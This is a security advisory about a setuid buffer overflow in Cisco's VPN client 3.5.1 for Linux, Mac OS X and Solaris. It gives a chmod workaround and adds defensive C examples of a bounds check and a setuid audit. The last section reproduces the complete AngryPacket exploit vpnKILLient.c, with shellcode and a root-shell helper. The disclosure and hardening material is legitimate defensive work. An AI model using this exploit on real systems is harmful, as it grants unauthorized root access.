Cisco VPN UNIX Mac OS X Client Security Issue
About Cisco VPN Client
The Cisco VPN (Virtual Private Network) Client establishes an encrypted tunnel between a local system and a Cisco VPN Concentrator. The tunnel provides confidentiality and integrity for the data in transit, allowing a user on the local system to securely connect to a corporate network via a public, possibly untrusted network.
Information
Cisco's VPN Client for Mac OS X, Linux and Solaris contains a buffer overflow that a local user can exploit to gain administrative (root) privileges. The client lets these non-Windows platforms establish a VPN tunnel to a Cisco VPN Concentrator. The Windows client is not affected by this advisory.
A local user with an account on a system where the UNIX VPN client is installed can run arbitrary code with administrative privileges. The client binary, vpnclient, is installed setuid root, so unless its permissions have been changed the overflow executes the attacker's code as root, letting the user modify any part of the system without authorization.
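As an added illustration (not Cisco's code and not the AngryPacket exploit), the following C program shows the bug class the advisory describes: a setuid-root program that copies the argument after "connect" into a fixed-size stack buffer without checking its length, next to the bounded version that refuses an argument that does not fit. The buffer size PROFILE_MAX, the function names and the sample profile name are assumptions chosen for the demonstration.

```c
/* Added example, not Cisco's code and not the vpnKILLient source: the bug
 * class the advisory describes. A setuid-root program copies a
 * command-line argument (the profile name after "connect") into a
 * fixed-size stack buffer with no length check; a long argument overwrites
 * the saved return address. Buffer size and function names are assumptions
 * chosen to make the pattern visible. */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define PROFILE_MAX 64   /* assumed; the client's real buffer size is not given on this page */
#define ATTACK_LEN  620  /* same length as the published exploit's argument */

/* Vulnerable pattern: unbounded copy of attacker-controlled input.
 * Called with a string longer than PROFILE_MAX this smashes the stack,
 * which under a setuid-root binary means root for whoever runs it. */
int load_profile_unsafe(const char *name) {
    char profile[PROFILE_MAX];
    strcpy(profile, name);   /* BUG: no bound; only safe for short names */
    return (int)strlen(profile);
}

/* Hardened pattern: check the length against the buffer first and refuse
 * anything that does not fit, rather than truncating silently. */
int load_profile_safe(const char *name) {
    char profile[PROFILE_MAX];
    size_t n = strlen(name);
    if (n >= sizeof profile)
        return -1;           /* oversized argument rejected before any copy */
    memcpy(profile, name, n + 1);
    return (int)n;
}

/* Build an argument the size the exploit uses (filler, not shellcode),
 * so the safe path can be shown rejecting it. Caller frees. */
char *make_overlong_arg(void) {
    char *a = malloc(ATTACK_LEN);
    if (!a) return NULL;
    memset(a, 'A', ATTACK_LEN - 1);
    a[ATTACK_LEN - 1] = '\0';
    return a;
}

/* Returns 1 when the hardened loader rejects an exploit-length argument
 * and still accepts a normal profile name. */
int hardened_loader_rejects_overflow(void) {
    char *a = make_overlong_arg();
    if (!a) return 0;
    int rejected = load_profile_safe(a) == -1;
    int accepted = load_profile_safe("corpnet") == 7;
    free(a);
    return rejected && accepted;
}

int main(int argc, char *argv[]) {
    /* Mimic the client's "connect <profile>" dispatch on the safe path only;
     * the unsafe path is never fed long input here, since that is the exploit. */
    const char *profile = (argc > 2 && strcmp(argv[1], "connect") == 0) ? argv[2] : "corpnet";
    int r = load_profile_safe(profile);
    if (r < 0)
        fprintf(stderr, "profile name too long (max %d bytes)\n", PROFILE_MAX - 1);
    else
        printf("loaded profile '%s' (%d bytes)\n", profile, r);
    printf("hardened loader rejects overflow: %s\n",
           hardened_loader_rejects_overflow() ? "yes" : "no");
    return r < 0 ? 1 : 0;
}
```

Compile it as an ordinary user and run it as ./demo connect <name>; with a name of 64 bytes or more the hardened loader refuses the argument, which is the check the vulnerable client lacked.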
Fix/Update
The vulnerability can be mitigated by removing the setuid bit from the vpnclient binary with chmod. Clearing the bit means the client no longer runs as root when an ordinary user starts it, which closes the privilege escalation; the trade-off is that the client must then be started by root (or through sudo), since it needs root to bring up the tunnel. In a Terminal window, as an administrator or root account, execute the following command, then confirm with ls -l that the mode reads -rwxr-xr-x rather than -rws--x--x:
/bin/chmod 755 /usr/local/bin/vpnclient
The vulnerability is fixed in version 3.5.2, which Cisco is to make available for download shortly. Go to the Cisco Software distribution center on Cisco's web page to download the new version of the UNIX VPN client.
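To verify that the workaround took, here is an added C audit routine (not part of the advisory or the exploit) that reports whether a binary still carries the setuid bit and clears it while keeping the other permission bits. The path defaults to /usr/local/bin/vpnclient from the advisory; the function names are assumptions, and the built-in self-test runs on a scratch file under /tmp so it can be tried without touching the real client.

```c
/* Added example, not part of the advisory or the exploit: report whether a
 * binary is setuid and optionally clear the bit, mirroring the chmod
 * workaround. Function names are assumptions for illustration. */
#ifndef _XOPEN_SOURCE
#define _XOPEN_SOURCE 700
#endif
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/stat.h>

/* Return 1 if path is setuid, 0 if not, -1 if it cannot be stat()ed. */
int is_setuid(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    return (st.st_mode & S_ISUID) ? 1 : 0;
}

/* Clear setuid and setgid while keeping the remaining permission bits,
 * so 4711 becomes 0711 and 4755 becomes 0755. Returns the new mode
 * (permission bits only) or -1 on failure. */
int drop_setuid(const char *path) {
    struct stat st;
    if (stat(path, &st) != 0) return -1;
    mode_t newmode = st.st_mode & 07777 & (mode_t)~(S_ISUID | S_ISGID);
    if (chmod(path, newmode) != 0) return -1;
    return (int)newmode;
}

/* Self-test on a constructed scratch file: mark it setuid, then drop the
 * bit and confirm it is gone. Returns 1 on success, 0 or -1 otherwise. */
int demo_on_tempfile(void) {
    char tmpl[] = "/tmp/vpnclient-auditXXXXXX";   /* constructed, not the real client */
    int fd = mkstemp(tmpl);
    if (fd < 0) return -1;
    close(fd);
    if (chmod(tmpl, 04755) != 0) { unlink(tmpl); return -1; }
    int before = is_setuid(tmpl);
    int after_mode = drop_setuid(tmpl);
    int after = is_setuid(tmpl);
    unlink(tmpl);
    return before == 1 && after == 0 && after_mode == 0755;
}

int main(int argc, char *argv[]) {
    const char *path = argc > 1 ? argv[1] : "/usr/local/bin/vpnclient";
    int s = is_setuid(path);
    if (s < 0)
        perror(path);
    else
        printf("%s: setuid bit %s\n", path, s ? "SET (exposed if older than 3.5.2)" : "clear");
    printf("scratch-file self-test: %s\n", demo_on_tempfile() == 1 ? "ok" : "failed");
    return 0;
}
```

Run it as root with no arguments after the chmod above; the first line should report the bit as clear. drop_setuid is deliberately not called on the real path from main, so the audit never changes anything on the system by itself.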
Exploit/Code for Cisco VPN Client for Linux/Mac OS X
The exploit code from AngryPacket Security, vpnKILLient.c, is reproduced below to show how the overflow is triggered. It passes a 620-byte argument as the profile name to vpnclient connect: the buffer is first filled with a guessed stack address, the first half is then overwritten with a NOP sled, and the shellcode (which calls setuid(0) and runs /tmp/xx) is placed in the middle of the sled, so any of the repeated addresses that lands in the sled leads to the shellcode.
/* buffer overflow for cisco's vpnclient for linux
tested against the latest release: vpnclient-linux-3.5.1.Rel-k9.tar.gz
to get this to properly work, you need to put the following code into
xx.c, compile it (as xx), and place the executable into /tmp (to bypass
tight PAM restrictions)
#include <stdio.h>
#include <unistd.h>
int main(void) {
setuid(0);
execl("/bin/sh", "sh", NULL);
return 0;
}
then compile this and run it. syntax is ./vpnKILLient <offset>
tested under gentoo linux and debian:
$ ls -la `which vpnclient`
-rws--x--x 1 root root 160900 Apr 13 22:34 /usr/local/bin/vpnclient
$ ./vpnKILLient
addr: 0xbffffbac, offset: 0
Cisco Systems VPN Client Version 3.5.1 (Rel)
Copyright (C) 1998-2002 Cisco Systems, Inc. All Rights Reserved.
Client Type(s): Linux
Running on: Linux 2.4.17 #1 Sat Apr 13 21:53:52 EDT 2002 i686
sh-2.05a# id
uid=0(root) gid=100(users) groups=100(users),10(wheel)
greetz: all of the angrypacket crew (of course)
shok -> pheerable^2;
vegac -> 31336++;
when you get a chance, check out http://sec.angrypacket.com
*/
#include <stdio.h>
#include <stdlib.h>   /* atoi, malloc */
#include <string.h>
#include <strings.h>  /* bzero */
#include <unistd.h>
#define NOP 0x90
#define LEN 620 /* 520 to own eip */
/* shellcode by vegac (setuid(0)->/tmp/xx) */
/* wont work if your /tmp partition is mounted noexec or nosuid */
char shell[]=
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80"   /* setuid(0) */
"\x31\xc0\x50\x68\x2f\x2f\x78\x78"   /* push "/tmp//xx" onto the stack */
"\x68\x2f\x74\x6d\x70\x89\xe3\x31"
"\xc0\x50\x89\xe2\x54\x89\xe1\xb0"
"\x0b\xcd\x80\x00";                  /* execve("/tmp//xx", ...) */
/* current stack pointer; i386/gcc only, the value is left in eax as the return value */
unsigned long get_sp (void) {
__asm__("mov %esp,%eax");
}
int main(int argc, char *argv[]) {
int i, offset=0;
long addr;
char *buf, *ptr;
if(argc > 1) offset = atoi(argv[1]);
buf = (char *)malloc(sizeof(char) * LEN);
bzero(buf, LEN);
addr = get_sp() - offset;   /* guessed address of the sled, tuned with <offset> */
printf("addr: 0x%lx, offset: %d\n", addr, offset);
/* fill the whole argument with the guessed address so the saved eip lands on it */
for(i = 0; i < LEN; i += 4) {
*(long *)&buf[i] = addr;
}
/* overwrite the first half with a NOP sled */
for(i = 0; i < (LEN / 2); i++) {
*(buf + i) = NOP;
}
/* centre the shellcode in the sled */
ptr = buf + ((LEN / 2) - (strlen(shell) / 2));
for(i = 0; i < strlen(shell); i++) {
*(ptr++) = shell[i];
}
buf[LEN - 1] = '\0';
/* hand the payload to the setuid client as the profile name */
execl("/usr/local/bin/vpnclient", "vpnclient", "connect", buf, (char *)0);
return(0);
}
More details are available in the Cisco Security Advisory: Buffer Overflows in UNIX VPN Client.